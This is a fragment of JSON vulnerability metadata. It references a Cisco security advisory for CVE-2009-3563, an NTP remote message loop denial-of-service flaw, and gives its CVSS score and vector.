"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20091208-CVE-2009-3563", "type": "cisco", "title": "Network Time Protocol Package Remote Message Loop Denial of Service Vulnerability", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}
